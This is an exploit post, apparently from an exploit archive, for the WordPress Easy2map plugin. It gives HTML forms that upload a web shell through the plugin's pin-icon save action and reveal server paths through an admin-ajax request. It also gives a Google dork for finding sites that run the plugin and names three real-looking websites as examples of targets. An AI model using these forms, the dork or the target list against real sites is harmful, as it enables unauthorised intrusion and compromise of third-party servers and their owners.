facebook facebook twitter rss

Wordpress Plugin Easy2map Authenticated User Shell upload/Path Disclosure

Author: Aloulou , Published: 28-06-2014
############################################################################

# Title : Wordpress Plugin Easy2map Authenticated User Shell upload/Path Disclosure

# Author : Aloulou

# Date : 23/06/2014

# Facebook : facebook.com/Aloulou.TN

# Email: aloulou@alquds.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/plugins/easy2map

# Tested on : Linux



############################################################################



Exploit:

<h1> Authenticated User Shell upload </h1>
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-admin/admin.php?page=easy2map&action=mappinimagesave&map_id=5" name="1337" method="post">
<input type="file" name="pinicon">
<input name="submit" type="submit" value="Upload">
</form>
<br>
<h1> Path Disclosure</h1>
<form action="http://127.0.0.1/wp-admin/admin-ajax.php" name="1337" method="post">
<input type="hidden" name="mapID" value="3">
<input type="hidden" name="action" value="retrieve_pin_icons">
<input type="submit" name="submit" value="Show Full Path">
</form>





Examples:

http://familysafeshelters.com
http://cartegriseinfo.com
http://www.amarilo.com.co



# Greeting to : Tunisia , CyberPink , AnonBoy and All muslims

Like us on Facebook :